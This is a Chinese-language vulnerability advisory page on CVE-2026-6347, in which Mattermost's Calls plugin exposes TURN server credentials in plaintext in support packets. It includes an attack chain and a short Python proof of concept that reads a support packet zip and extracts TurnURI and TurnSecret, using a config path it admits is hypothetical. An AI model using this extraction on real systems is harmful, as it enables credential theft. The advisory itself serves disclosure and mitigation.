CVE-2026-6347 CVSS 7.6 高危

CVE-2026-6347 Mattermost凭证信息泄露

披露日期: 2026-05-18

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-6347

漏洞类型

信息泄露

CVSS评分

7.6 高危

攻击向量

网络 (AV:N)

认证要求

高权限 (PR:H)

用户交互

无需交互 (UI:N)

影响产品

Mattermost

漏洞概述

Mattermost特定版本在Calls插件中未能正确清理敏感配置。攻击者若能访问支持数据包，即可通过导出的插件配置中的明文值获取TURN服务器凭证。

技术细节

该漏洞的核心在于Mattermost Calls插件在导出配置或生成支持数据包时，未对敏感信息字段进行脱敏处理。具体而言，TURN服务器的认证凭据以明文形式存储在导出的配置文件中。由于CVSS评分要求高权限（PR:H），利用该漏洞通常需要攻击者已具备获取支持数据包的权限（例如管理员账户或通过社工获取）。攻击者一旦获得数据包，解压后即可直接读取插件配置JSON文件，提取出TURN服务器的URI、用户名及密码，从而利用这些凭证接管TURN服务或进行流量拦截。

攻击链分析

STEP 1

获取支持数据包

攻击者通过高权限账户或社工手段获取Mattermost系统的支持数据包。

STEP 2

解压数据包

解压下载的支持数据包文件，访问内部的配置文件。

STEP 3

定位插件配置

在解压后的文件中查找Mattermost Calls插件的配置文件（通常为JSON格式）。

STEP 4

提取明文凭证

读取配置文件，直接获取未加密的TURN服务器URI和认证密钥。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# Proof of Concept for CVE-2026-6347
# This script simulates extracting credentials from a Mattermost support packet.

import zipfile
import json
import os

def extract_turn_credentials(support_packet_path):
    """
    Parses a Mattermost support packet to find TURN credentials.
    """
    turn_creds = []
    try:
        with zipfile.ZipFile(support_packet_path, 'r') as z:
            for filename in z.namelist():
                if 'config' in filename.lower() and filename.endswith('.json'):
                    with z.open(filename) as f:
                        data = json.load(f)
                        # Hypothetical path based on Mattermost config structure
                        if 'PluginSettings' in data and 'mattermost' in data['PluginSettings']:
                            calls_config = data['PluginSettings']['mattermost'].get('calls', {})
                            turn_secret = calls_config.get('TurnSecret')
                            turn_uri = calls_config.get('TurnURI')
                            if turn_secret or turn_uri:
                                turn_creds.append({
                                    'file': filename,
                                    'TurnURI': turn_uri,
                                    'TurnSecret': turn_secret
                                })
    except Exception as e:
        print(f"Error: {e}")
    return turn_creds

# Usage
# creds = extract_turn_credentials('mattermost_support_packet.zip')
# print(creds)

影响范围

Mattermost 11.5.x <= 11.5.1

Mattermost 10.11.x <= 10.11.13

Mattermost 11.4.x <= 11.4.3

防御指南

临时缓解措施

建议立即升级到修复了该漏洞的Mattermost版本。在无法立即升级的情况下，应严格限制支持数据包的访问权限，并确保在生成数据包前手动移除或修改Calls插件中的敏感配置信息。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2026-6347
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2026-6347
3 Details https://www.cvedetails.com/cve/CVE-2026-6347/
4 VulDB https://vuldb.com/cve/CVE-2026-6347
5 Link https://mattermost.com/security-updates

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表